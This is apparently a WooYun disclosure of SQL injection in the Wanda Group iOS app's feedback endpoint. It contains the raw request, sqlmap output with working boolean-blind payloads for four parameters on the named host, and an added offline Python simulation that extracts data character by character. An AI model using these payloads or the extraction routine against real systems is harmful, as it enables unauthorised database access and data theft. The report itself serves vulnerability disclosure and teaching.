WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online --------- http://drop.zone.ci/
2015-01-04: Details sent to the vendor, awaiting vendor action
2015-01-04: Vendor confirmed; details disclosed to the vendor only
2015-01-14: Details disclosed to core whitehats and domain experts
2015-01-24: Details disclosed to regular whitehats
2015-02-03: Details disclosed to intern whitehats
2015-02-18: Details disclosed to the public
Do you love me?
Wanda Group iOS app v2.2
POST /wanda3v/h/addfeedback.html HTTP/1.1
Host: app.wanda.cn
Proxy-Connection: close
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 229
Connection: close
Cookie: Hm_lpvt_cd44f738169a36ff869eee3ca6afb9b1=1420337769; Hm_lvt_cd44f738169a36ff869eee3ca6afb9b1=1420118152,1420337420,1420337769
User-Agent: 万达集团 2.2 rv:7045 (iPhone; iPhone OS 8.1.2; zh_CN)

devid=192F4332-50C9-45D5-9CE5-02BAE96B5C2E&devicetype=0&resolution=1136%2A640&appversion=2.2&devtype=0&content=fs&vid=7d996adaf86b44d2913a6366808926d5&email=1221%40qq.com&sysversion=8.1.2&phonemodel=iPhone%206&systype=iPhone%20OS
Multiple parameters are vulnerable to SQL injection
sqlmap identified the following injection points with a total of 7629 HTTP(s) requests:
---
Parameter: content (POST)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: devid=192F4332-50C9-45D5-9CE5-02BAE96B5C2E&devicetype=0&resolution=1136*640&appversion=2.2&devtype=0&content=fs' RLIKE (SELECT (CASE WHEN (7172=7172) THEN 0x6673 ELSE 0x28 END)) AND 'Vgrh'='Vgrh&vid=7d996adaf86b44d2913a6366808926d5&email=1221@qq.com&sysversion=8.1.2&phonemodel=iPhone 6&systype=iPhone OS

Parameter: devicetype (POST)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: devid=192F4332-50C9-45D5-9CE5-02BAE96B5C2E&devicetype=0' RLIKE (SELECT (CASE WHEN (7522=7522) THEN 0 ELSE 0x28 END)) AND 'CAqA'='CAqA&resolution=1136*640&appversion=2.2&devtype=0&content=fs&vid=7d996adaf86b44d2913a6366808926d5&email=1221@qq.com&sysversion=8.1.2&phonemodel=iPhone 6&systype=iPhone OS

Parameter: vid (POST)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: devid=192F4332-50C9-45D5-9CE5-02BAE96B5C2E&devicetype=0&resolution=1136*640&appversion=2.2&devtype=0&content=fs&vid=7d996adaf86b44d2913a6366808926d5' RLIKE (SELECT (CASE WHEN (4488=4488) THEN 0x3764393936616461663836623434643239313361363336363830383932366435 ELSE 0x28 END)) AND 'UkkU'='UkkU&email=1221@qq.com&sysversion=8.1.2&phonemodel=iPhone 6&systype=iPhone OS

Parameter: email (POST)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: devid=192F4332-50C9-45D5-9CE5-02BAE96B5C2E&devicetype=0&resolution=1136*640&appversion=2.2&devtype=0&content=fs&vid=7d996adaf86b44d2913a6366808926d5&email=1221@qq.com' RLIKE (SELECT (CASE WHEN (8648=8648) THEN 0x313232314071712e636f6d ELSE 0x28 END)) AND 'MtMZ'='MtMZ&sysversion=8.1.2&phonemodel=iPhone 6&systype=iPhone OS
---
[10:34:09] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: devicetype, type: Single quoted string (default)
[1] place: POST, parameter: content, type: Single quoted string
[2] place: POST, parameter: vid, type: Single quoted string
[3] place: POST, parameter: email, type: Single quoted string
[q] Quit
>
[10:34:26] [INFO] testing MySQL
[10:34:26] [INFO] confirming MySQL
[10:34:26] [INFO] the back-end DBMS is MySQL
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.0
By the look of it this is not the same internal server as the one from the earlier getshell, so there is something to work with here.
Take it offline and fix it!
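The sqlmap output above names the technique ("MySQL boolean-based blind ... (RLIKE)") but not why those payloads work. The following is an added example, not code from the report or from Wanda: it rebuilds the exact payload shape sqlmap printed, explains the oracle it creates, and drives that oracle to read a value one bit at a time. Everything server-side is assumed and simulated: app.wanda.cn is never contacted, a small function stands in for the feedback endpoint concatenating `content` into `WHERE content='...'`, the "secret" row is a constructed in-memory SQLite table, and because SQLite evaluates the condition it is written with `unicode(substr())` (the MySQL equivalent is `ORD(MID())`, noted in the comments).

```python
"""Added example: sqlmap's RLIKE boolean-blind oracle, reconstructed and simulated.

Not the report's or the vendor's code. The backend, the endpoint and the data
are assumptions so the script runs offline.
"""
import re
import sqlite3

# Constructed sample data standing in for the real back-end database.
SECRET_DB = sqlite3.connect(":memory:")
SECRET_DB.execute("CREATE TABLE feedback_users(email TEXT)")
SECRET_DB.execute("INSERT INTO feedback_users VALUES ('1221@qq.com')")


def build_rlike_payload(original: str, condition: str, tail: str = "Vgrh") -> str:
    """Rebuild the payload shape sqlmap reported for each parameter.

    The THEN branch returns the parameter's own value (hex-encoded, or bare for
    a number) so 'value' RLIKE 'value' matches; the ELSE branch returns 0x28,
    i.e. '(', an unbalanced regex that makes MySQL raise an error instead of
    matching. `tail` is sqlmap's random closing token (Vgrh, CAqA, ... above).
    """
    then_value = original if original.isdigit() else "0x" + original.encode().hex()
    return (f"{original}' RLIKE (SELECT (CASE WHEN ({condition}) "
            f"THEN {then_value} ELSE 0x28 END)) AND '{tail}'='{tail}")


_PAYLOAD_RE = re.compile(
    r"(.*)' RLIKE \(SELECT \(CASE WHEN \((.*)\) THEN (\S+) ELSE 0x28 END\)\) "
    r"AND '(\w+)'='\4")


def simulated_feedback_endpoint(content: str) -> int:
    """Assumed stand-in for POST /wanda3v/h/addfeedback.html (not the real app).

    Emulates MySQL evaluating  ... WHERE content='<content>'  with <content>
    concatenated in unescaped. Returns an HTTP-style status: 200 when the
    RLIKE matches (true branch), 500 when the regex is invalid (false branch).
    """
    m = _PAYLOAD_RE.fullmatch(content)
    if not m:                      # no injection: the normal, uninteresting path
        return 200
    left, condition, _then, _tail = m.groups()
    # SQLite evaluates the attacker-chosen condition in this simulation.
    cond_true = bool(SECRET_DB.execute(f"SELECT ({condition})").fetchone()[0])
    regex = left if cond_true else "("   # what the CASE expression yields
    try:
        re.search(regex, left)     # MySQL: 'left' RLIKE regex
        return 200
    except re.error:               # MySQL: "Got error ... from regexp"
        return 500


def oracle(original: str, condition: str) -> bool:
    """True iff the injected condition held, judged purely from the response."""
    return simulated_feedback_endpoint(build_rlike_payload(original, condition)) == 200


def extract(original: str, expression: str, max_len: int = 64) -> str:
    """Read the string `expression` evaluates to, one character per 7 oracle
    calls (binary search over codes 0..127). Stops past the end of the string,
    where unicode(substr()) is NULL and every comparison comes back false."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 128
        while lo < hi:
            mid = (lo + hi) // 2
            # Against MySQL this condition would read: ORD(MID((expr),pos,1)) > mid
            if oracle(original, f"unicode(substr(({expression}),{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        out += chr(lo)
    return out


if __name__ == "__main__":
    print(build_rlike_payload("fs", "7172=7172"))
    print(extract("fs", "SELECT email FROM feedback_users LIMIT 1"))
```

The point to take from the simulation is that nothing in the response body has to leak: the true branch behaves like the original request and the false branch produces a database error, and that single distinguishable difference, repeated about seven times per character, is all sqlmap needed to confirm four injectable parameters in this one form.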
Severity: High
Vulnerability Rank: 12
Confirmed: 2015-01-04 10:53
Thanks to zzR for the attention and contribution! Notifying the business unit for remediation right away!
None